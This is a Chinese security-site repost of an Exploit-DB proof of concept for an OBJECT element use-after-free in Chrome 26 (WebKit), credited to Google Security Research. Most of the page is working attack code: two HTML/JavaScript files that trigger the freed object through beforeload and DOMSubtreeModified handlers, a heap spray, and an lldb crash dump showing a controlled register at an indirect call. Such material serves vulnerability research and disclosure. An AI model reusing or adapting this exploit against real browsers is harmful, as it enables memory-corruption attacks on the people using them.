首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC 来源：Google Security Research 作者：Google 发布时间：2016-08-17   #---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# <html>     <head>         <script>             function sprayOne(mem, size, v) {                                 var a = new Uint8ClampedArray(size - 20);                                 for (var j = 0; j < a.length; j++) a[j] = v;                 var t = document.createTextNode(String.fromCharCode.apply(null, new Uint16Array(a)));                                 mem.push(t);             }             function dsm(evnt) {                 // spray                 var mem = [];                 for (var j = 20; j < 8192; j++) sprayOne(mem, j, 0x43);                  /*   Chromium release build 28.0.1461.0 (191833), built with options:   GYP_GENERATORS=ninja GYP_DEFINES='component=shared_library mac_strip_release=0' gclient runhooks   lldb attached to Chromium in --single-process mode:   * thread #28: tid = 0x3803, 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155, stop reason = EXC_BAD_ACCESS (code=1, address=0x43434617)     frame #0: 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155    152      virtual IntRect borderBoundingBox() const { return pixelSnappedBorderBoxRect(); }    153     154      // The content area of the box (excludes padding - and intrinsic padding for table cells, etc... - and border). -> 155       LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }    156      // The content box in absolute coords. Ignores transforms.    157      IntRect absoluteContentBox() const;    158      // The content box converted to absolute coords (taking transforms into account).   (lldb) reg read General Purpose Registers:        eax = 0x43434343        ebx = 0x12ae436c        ecx = 0x00000018        edx = 0x0edab374        edi = 0x0edd6858        esi = 0x12ae436c        ebp = 0xb9bf8e38        esp = 0xb9bf8d50         ss = 0x00000023     eflags = 0x00010286        eip = 0x07b617e4  libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172   libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172         cs = 0x0000001b         ds = 0x00000023         es = 0x00000023         fs = 0x00000023         gs = 0x0000000f   (lldb) disass libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172 libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172: -> 0x7b617e4:  calll  *724(%eax)    0x7b617ea:  movl   %eax, -180(%ebp)    0x7b617f0:  movl   (%ebx), %eax    0x7b617f2:  movl   %ebx, (%esp)   */             }         </script>     </head>     <body>         <iframe src="object-beforeload-frame-chrome.html"></iframe>     </body> </html> #----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#           #---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# <html>     <head>         <script>             var nb = 0;             function handleBeforeLoad() {                 if (++nb == 1) {                     p.addEventListener('DOMSubtreeModified', parent.dsm, false);                 } else if (nb == 2) {                     p.removeChild(f);                 }             }                          function documentLoaded() {                 f = window.frameElement;                 p = f.parentNode;                 var o = document.createElement("object");                 o.addEventListener('beforeload', handleBeforeLoad, false);                 document.body.appendChild(o);             }               window.onload = documentLoaded;         </script>     </head>     <body></body> </html> #----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#   ## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Actiontec T2200H Remote Revers ·Internet Explorer - MSHTML!CMu ·Samsung Smart Home Camera SNH- ·Metasploit Service Persistence ·FreePBX 13 / 14 - Remote Comma ·Metasploit Cron Persistence Mo ·WebNMS Framework Server 5.2 Ar ·SIEMENS IP Camera CCMW1025 x.2 ·DLL Side Loading In VMware Hos ·Windows - Fileless UAC Protect ·NUUO NVRmini 2 / NETGEAR Ready ·ZYCOO IP Phone System - Remote   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved